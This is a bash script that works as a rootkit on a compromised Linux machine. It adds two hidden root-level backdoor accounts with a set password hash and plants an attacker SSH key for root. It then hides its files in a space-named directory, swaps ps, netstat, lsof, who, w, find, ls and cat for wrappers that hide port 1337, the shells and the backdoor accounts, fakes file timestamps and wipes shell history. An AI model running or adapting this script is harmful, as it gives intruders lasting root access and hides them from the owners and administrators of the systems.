cmd_wrapper.bash

# TODO
# copy binarys to new location, execute from said location. ensure ps command filters out commands

#PORT="1337"


# Add users, cat ssh key for ssh key access, clear history, copy shells with sguid bit set to hidden files for later use
deluser news  > /dev/null 2>&1
deluser list > /dev/null 2>&1
sed '7ilist:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt
sed '7ilist:$6$Pgr2zg2C$dXr7E7txxsnqGvGYOqYxF5KwkLjQx70gFjuoXIi2PclRxDlm4.jDAvJRhu7OHPG3rRblV29XuQ6mBRcUog1MW0:15401:0:99999:7:::' /etc/shadow > /tmp/out.txt && cat /tmp/out.txt > /etc/shadow && rm /tmp/out.txt

sed '8inews:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt
sed '8inews:$6$Pgr2zg2C$dXr7E7txxsnqGvGYOqYxF5KwkLjQx70gFjuoXIi2PclRxDlm4.jDAvJRhu7OHPG3rRblV29XuQ6mBRcUog1MW0:15401:0:99999:7:::' /etc/shadow > /tmp/out.txt && cat /tmp/out.txt > /etc/shadow && rm /tmp/out.txt

mkdir /root/.ssh > /dev/null 2>&1; echo " ssh-dss AAAAB3NzaC1kc3MAAACBANux0TRi7X4Jet/Y/9Nyo517a1YskOqr4iBKEmDXf9qvKLUvdsEfBuJ4uAa3IEcCuE+9Rs/TtJYJOmpD9uCV9lNo/ZNZqCZDr2ERDcusM3L7T0ZwyZewQvixsJ9VZRffYOv8vtaT9Xu9Y+ILXNZDOx39evoqGqsPGb7w3zboHcjNAAAAFQDEn+/NLtr2oPNUlLnt/0kwH+w0UQAAAIBKTkDXiuBHGM7vKYXraFdcVgl/XYuHnChypzAVEqwNHBRbGUg4OHr29j7ncIYK2Y7zvO4KdrJ/uohm1cGSHsmXESiNjPnhFJHo6tIaNlpTk/YzTiPmJk8Wc/hdjdCamBF++3NsixMo7OfqDqXS461QpXKDdTa/rqi0fHsgLIcDKgAAAIBSzxtMPcoF3k+UQmtwIlUQt8tDt0OaCxoO8A+R7GW1rbqPDJXbHHWZVsf/7IS1WRvrajISiVPEPxIAPZVAv1HFTrMseKoMF1xYaS27q6ld1cIBK4CXPW2zzgnpDgqpCVkQEsfSfISgQ6EbU3dff/ipGOGvEFBT5doh8dZRqA+Bng== root@bt" >>/root/.ssh/authorized_keys

# create " " dir used for holding actual binarys and other thigns if needed
dirstamp="`ls -ld /bin/cat | awk {'print $6'} 2>./log.error`"
echo $dirstamp
mkdir /usr/lib/" "
touch -d $dirstamp /usr/lib/" "

# copy grep over for all other pwnage
cp /bin/grep /usr/lib/" "/

# create error log file for testing
touch log.error


# lsof ownage
lsofstamp="`ls -l /usr/bin/lsof 2>log.error | awk {'print $6'}`"
echo $lsofstamp
touch ./lsof
chmod 755 ./lsof

read -d '' lsof <<"BLOCK"
#!/bin/bash

/usr/lib/" "/lsof $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK

echo "$lsof" > lsof

mv /usr/bin/lsof /usr/lib/" "/
mv ./lsof /usr/bin/
touch -d $lsofstamp /usr/bin/lsof


# Netstat ownage
netstatstamp="`ls -l /bin/netstat 2>log.error | awk {'print $6'}`"
echo $netstatstamp
touch ./netstat
chmod 755 ./netstat

read -d '' netstat <<"BLOCK"
#!/bin/bash

/usr/lib/" "/netstat $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK

echo "$netstat" > netstat

mv /bin/netstat /usr/lib/" "/
mv ./netstat /bin/
touch -d $netstatstamp /bin/netstat



# ps command hack
psstamp="`ls -l /bin/ps 2>log.error | awk {'print $6'}`"
echo $psstamp
touch ./ps
chmod 755 ./ps

read -d '' ps <<"BLOCK"
#!/bin/bash

/usr/lib/" "/ps $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK

echo "$ps" > ps

mv /bin/ps /usr/lib/" "/
mv ./ps /bin/
touch -d $psstamp /bin/ps

# who command hack
whostamp="`ls -l /usr/bin/who 2>log.error | awk {'print $6'}`"
echo $whostamp
touch ./who
chmod 755 ./who

read -d '' who <<"BLOCK"
#!/bin/bash

/usr/lib/" "/who $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK

echo "$who" > who

mv /usr/bin/who /usr/lib/" "/
mv ./who /usr/bin/
touch -d $whostamp /usr/bin/who

# w command hack
wstamp="`ls -l /usr/bin/w 2>log.error | awk {'print $6'}`"
echo $wstamp
touch ./w
chmod 755 ./w

read -d '' ww <<"BLOCK"
#!/bin/bash

/usr/lib/" "/w $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK

echo "$ww" > w

mv /usr/bin/w /usr/lib/" "/
mv ./w /usr/bin/
touch -d $wstamp /usr/bin/w

# find hack
findstamp="`ls -l /usr/bin/find 2>log.error | awk {'print $6'}`"
echo $findstamp
touch ./find
chmod 755 ./find

read -d '' find <<"BLOCK"
#!/bin/bash

/usr/lib/" "/find $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK

echo "$find" > find

mv /usr/bin/find /usr/lib/" "/
mv ./find /usr/bin/
touch -d $findstamp /usr/bin/find


# tcpdump hack
lsstamp="`ls -l /bin/ls 2>log.error | awk {'print $6'}`"
echo $lsstamp
touch ./ls
chmod 755 ./ls

read -d '' ls <<"BLOCK"
#!/bin/bash

/usr/lib/" "/ls $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK

echo "$ls" > ls

mv /bin/ls /usr/lib/" "/
mv ./ls /bin/
touch -d $lsstamp /bin/ls

# Remove stuff
cat ~/.bashrc | /usr/lib/" "/grep -v "alias ls" | /usr/lib/" "/grep -v "alias ll" | /usr/lib/" "/grep -v "alias la" | /usr/lib/" "/grep -v "alias l=" > ~/.bashrc

#cat ownage
catstamp="`ls -l /bin/cat 2>log.error | awk {'print $6'}`"
echo $catstamp
touch ./cat
chmod 755 ./cat

read -d '' cat <<"BLOCK"
#!/bin/bash

/usr/lib/" "/cat $@ | /usr/lib/" "/grep -v 'list' | /usr/lib/" "/grep -v 'news' | /usr/lib/" "/grep -v 'bad_shell3'
BLOCK

echo "$cat" > cat

mv /bin/cat /usr/lib/" "/
mv ./cat /bin/
touch -d $catstamp /bin/cat

# clear out history
history -c
unset HISTFILE
rm -rf ~/.bash_history > /dev/null 2>&1